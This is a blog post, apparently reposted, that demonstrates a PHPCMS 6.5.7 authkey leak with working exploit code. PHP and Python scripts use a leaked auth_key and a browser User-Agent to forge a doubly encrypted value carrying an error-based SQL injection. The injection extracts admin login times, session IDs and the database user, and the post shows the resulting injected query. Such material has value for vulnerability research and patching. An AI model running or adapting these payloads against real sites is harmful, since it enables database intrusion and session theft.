  • A design flaw in PHPCMS can leak the authkey [payload-generation code for version 6.5.7]


    <?php
    /**
     * String encrypt/decrypt function (PHPCMS sys_auth, with the key supplied by the
     * caller instead of being read from pc_base::load_config('system', 'auth_key'))
     *
     * @param    string    $string       the string
     * @param    string    $operation    ENCODE to encrypt, DECODE to decrypt; optional, defaults to ENCODE
     * @param    string    $key          key: digits, letters, underscore
     * @param    string    $expiry       expiry time in seconds from now; 0 means never expires
     * @return   string
     */
    function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
        $key_length = 4;
        // In PHPCMS this line reads pc_base::load_config('system', 'auth_key'); here the key comes from the caller
        $key = md5($key != '' ? $key : "");

        $fixedkey = md5($key);
        $egiskeys = md5(substr($fixedkey, 16, 16));
        // 4-char random prefix on ENCODE; on DECODE it is read back from the front of the input
        $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
        $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
        // plaintext layout: 10-digit expiry | first 16 hex chars of md5($string . $egiskeys) | $string
        $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));

        $result = '';
        $string_length = strlen($string);
        for ($i = 0; $i < $string_length; $i++){
            // byte-wise XOR with the 32-char hex keystream ($string[$i] replaces the $string{$i} syntax removed in PHP 8)
            $result .= chr(ord($string[$i]) ^ ord($keys[$i % 32]));
        }
        if($operation == 'ENCODE') {
            return $runtokey . str_replace('=', '', base64_encode($result));
        } else {
            // accept only if not expired and the 16-char md5 tag over the payload matches
            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
                return substr($result, 26);
            } else {
                return '';
            }
        }
    }

    # auth_key . UA, the input to the md5() in get_auth_key():
    # XNvNxVxghgMEoNNq9MiUMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
    $auth_key = "XNvNxVxghgMEoNNq9MiU";
    $ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0";
    function get_auth_key() {
        global $auth_key;
        global $ua;
        $pc_auth_key = md5($auth_key.$ua);
        return $pc_auth_key;
    }
    $auth_key2 = get_auth_key();
    $sql = "1' and (extractvalue(1,concat(0x7e,(select lastlogintime from v9_admin limit 0,1))));#	xx";
    #$sql = "1' and (extractvalue(1,concat(0x7e,(select sessionid from v9_session limit 1,1))));#	okee";
    #echo $auth_key2;
    // first layer: encrypted with md5(auth_key . UA)
    $sec1 = sys_auth($sql,"ENCODE",$auth_key2);
    #echo $sec1;
    #echo "\n";
    // second layer: encrypted with auth_key itself; the output is the value to send
    echo sys_auth($sec1,"ENCODE",$auth_key);

      // Error-triggering query (the decrypted string lands unescaped in the WHERE clause):

     SELECT * FROM `tianyu`.`v9_member` WHERE  `userid` = '1' and (extractvalue(1,concat(0x7e,(select user()))));#' LIMIT 1
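    The PHP above only encodes; the decode branch is what the server runs. As an added example written for this page (not code from the original post or from PHPCMS), the following Python port of sys_auth() implements both ENCODE and DECODE, builds the two-layer value the same way as above, checks that each layer unwraps back to the injected string, and shows that changing one character of the outer layer trips the md5 integrity tag. The `runtokey` parameter, the `forge`/`unwrap`/`tamper`/`render_query` helpers and the `PAYLOAD` string are assumptions introduced here; the auth_key and User-Agent values are the ones used on the page.

```python
# Added example: Python port of PHPCMS sys_auth() (ENCODE and DECODE) plus the
# two-layer wrapping used on this page. Not code from the original post or PHPCMS.
import base64
import hashlib
import time
from typing import Optional

KEY_LENGTH = 4  # $key_length: size of the random prefix


def _md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def sys_auth(string: str, operation: str = "ENCODE", key: str = "",
             expiry: int = 0, runtokey: Optional[str] = None) -> str:
    """Port of sys_auth(). `runtokey` is an addition (assumption) that pins the
    4-char prefix for reproducible tests; the PHP derives it from microtime(true)."""
    key = _md5hex(key.encode())
    fixedkey = _md5hex(key.encode())
    egiskeys = _md5hex(fixedkey[16:32].encode())
    if operation == "ENCODE":
        if runtokey is None:
            runtokey = _md5hex(repr(time.time()).encode())[-KEY_LENGTH:]
    else:
        runtokey = string[:KEY_LENGTH]
    keys = _md5hex((runtokey[:16] + fixedkey[:16] + runtokey[16:] + fixedkey[16:]).encode()).encode()

    if operation == "ENCODE":
        plain = string.encode()
        header = b"%010d" % (expiry + int(time.time()) if expiry else 0)
        # plaintext layout: 10-digit expiry | 16 hex chars of md5(plain . egiskeys) | plain
        buf = header + _md5hex(plain + egiskeys.encode())[:16].encode() + plain
    else:
        body = string[KEY_LENGTH:]
        # PHP's non-strict base64_decode accepts the stripped '=' padding; restore it for Python
        buf = base64.b64decode(body + "=" * (-len(body) % 4))

    # byte-wise XOR against the 32-char hex keystream, exactly as the PHP loop does
    result = bytes(b ^ keys[i % 32] for i, b in enumerate(buf))

    if operation == "ENCODE":
        return runtokey + base64.b64encode(result).decode().rstrip("=")

    header, tag, plain = result[:10], result[10:26], result[26:]
    if not header.isdigit():  # garbage header: wrong key or tampering
        return ""
    not_expired = int(header) == 0 or int(header) - int(time.time()) > 0
    tag_ok = tag == _md5hex(plain + egiskeys.encode())[:16].encode()
    return plain.decode("utf-8", errors="replace") if (not_expired and tag_ok) else ""


AUTH_KEY = "XNvNxVxghgMEoNNq9MiU"  # value used on the page
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
# constructed sample: the injection string seen in the page's error line
PAYLOAD = "1' and (extractvalue(1,concat(0x7e,(select user()))));#"


def inner_key(auth_key: str, ua: str) -> str:
    """md5(auth_key . User-Agent), as get_auth_key() on the page."""
    return _md5hex((auth_key + ua).encode())


def forge(sql: str, auth_key: str, ua: str, runtokey: Optional[str] = None) -> str:
    """Same two-layer wrapping as the PHP: inner with md5(auth_key . UA), outer with auth_key."""
    inner = sys_auth(sql, "ENCODE", inner_key(auth_key, ua), runtokey=runtokey)
    return sys_auth(inner, "ENCODE", auth_key, runtokey=runtokey)


def unwrap(cookie: str, auth_key: str, ua: str) -> str:
    """Decode side (assumed mirror of forge): outer layer first, then inner layer.
    Returns '' when either layer fails its expiry or integrity check."""
    inner = sys_auth(cookie, "DECODE", auth_key)
    return sys_auth(inner, "DECODE", inner_key(auth_key, ua)) if inner else ""


def tamper(cookie: str, pos: int = 40) -> str:
    """Change one base64 character past the 26-byte header so the md5 tag no longer matches."""
    body = cookie[KEY_LENGTH:]
    c = "B" if body[pos] == "A" else "A"
    return cookie[:KEY_LENGTH] + body[:pos] + c + body[pos + 1:]


def render_query(userid: str) -> str:
    """Constructed sketch of the unescaped interpolation behind the page's error line."""
    return "SELECT * FROM `v9_member` WHERE `userid` = '%s' LIMIT 1" % userid


if __name__ == "__main__":
    cookie = forge(PAYLOAD, AUTH_KEY, UA)
    print("value to send:      ", cookie)
    print("server decodes to:  ", unwrap(cookie, AUTH_KEY, UA))
    print("query becomes:      ", render_query(unwrap(cookie, AUTH_KEY, UA)))
    print("tampered decodes to:", repr(unwrap(tamper(cookie), AUTH_KEY, UA)))
```

    The port treats a non-numeric expiry header as a failed check; the PHP compares it with a loose `==` and then subtracts `time()`, so its behaviour on garbage input is version-dependent, but for a correctly keyed value the two agree. Because the tag is md5 over the payload with a key derived only from auth_key, anyone holding auth_key can produce values that pass the check, which is why the leak in the title matters.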

    Reference: http://0day5.com/archives/3251/


  • Original post: https://www.cnblogs.com/diligenceday/p/12405826.html